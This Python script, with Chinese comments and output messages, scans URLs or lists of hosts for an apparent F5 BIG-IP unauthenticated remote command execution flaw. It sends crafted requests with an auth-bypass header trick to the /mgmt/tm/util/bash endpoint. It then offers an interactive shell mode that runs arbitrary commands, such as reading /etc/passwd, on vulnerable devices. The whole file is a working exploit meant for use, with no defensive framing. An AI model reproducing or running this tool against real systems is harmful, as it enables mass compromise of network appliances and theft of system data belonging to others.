import argparse   
from distutils.log import error
from time import time
import requests
import sys
import random
import json
from urllib import error
from requests.exceptions import RequestException
from requests import RequestException
import pandas as pd
import urllib3
urllib3.disable_warnings()

dataso={
        "command":"run",
        "utilCmdArgs":"-c id"
}
hea={
    "Host": "localhost.localdomain",
    "X-F5-Auth-Token":"-",
    "Authorization": "Basic YWRtaW46",
    "Connection": "Keep-Alive,X-F5-Auth-Token",
    "Content-Type": "application/json",
    "Referer":"127.0.0.1"
}

def parse_args():
    """
    :return:进行参数的解析
    """
    parser = argparse.ArgumentParser(description=('\tExample: \r\npython ' + sys.argv[0] + " -u http://www.baidu.com"))
    parser.add_argument('-u','--url',help = "单个路径扫描") 
    parser.add_argument('-l','--lists',help = "对文件中url进行扫描-保存在list.txt文件中")                      
    parser.add_argument('-exp','--exp',help = "漏洞利用-shell>>'cat /etc/passwd'")
    args = parser.parse_args()                                               
    return args

if __name__ == '__main__':
    args = parse_args()
    url = args.url
    lists = args.lists            
    exp = args.exp
    if lists!=None:
        h="/mgmt/tm/util/bash"
        f = open(lists,encoding='utf-8')
        while True:
            line = f.readline()  
            if line:
            
                m = line.strip()
                k = (m+h)
                l = k.strip()
                try:
                    re1 = requests.post(l,headers=hea,data=json.dumps(dataso),verify=False,timeout=0.9)    
                    if re1.status_code==200:
                        print('\033[1;32;40m可能存在bigip未授权rce\033[0m',re1.status_code,l)
                        file = open('list.txt','a')
                        file.write(l+'\n')
                    else:
                        print("不存在",l)
                
                except RequestException:
                    print("不存在",l)
                    continue
                except error.URLError:
                    print("域名访问失败",k)
                    continue
                except TimeoutError:
                    print("超时",k)
                    continue

            else:
                break
        f.close()


    else:
        if url !=None:
            h="/mgmt/tm/util/bash"
            p = url
            
            
            line = p
            if line:
            
                m = line.strip()
                k = (m+h)
                l = k.strip()
            
                try:
                    re2 = requests.post(l,headers=hea,data=json.dumps(dataso),verify=False,timeout=0.9)    
                    if re2.status_code==200:
                        print('\033[1;32;40m可能存在bigip未授权rce\033[0m',re2.status_code,l)
                        file = open('list.txt','a')
                        file.write(l+'\n')
                    else:
                        print("不存在",l)
                        
                except requests.exceptions.ConnectionError:
                    re2.status_code = "Connection refused"
                except RequestException:
                    print("不存在",l)
                    
                except error.URLError:
                    print("域名访问失败",k)
                    
                except TimeoutError:
                    print("超时",k)
        else:
            if exp !=None:
                s3 = exp.strip()
                while True:
                    osl = input("shell>>")
                    os2 = ("-c"+" "+osl)
                    datas = {
                    "command":"run",
                    "utilCmdArgs":os2
                    }
                    

                    res3 = requests.post(s3, headers=hea, data=json.dumps(datas),verify=False)
                    l = json.loads(res3.text)

                    print(l["commandResult"])
            else:
                print('Example: \r\npython ' + sys.argv[0] + " -u http://www.baidu.com")
    

                


       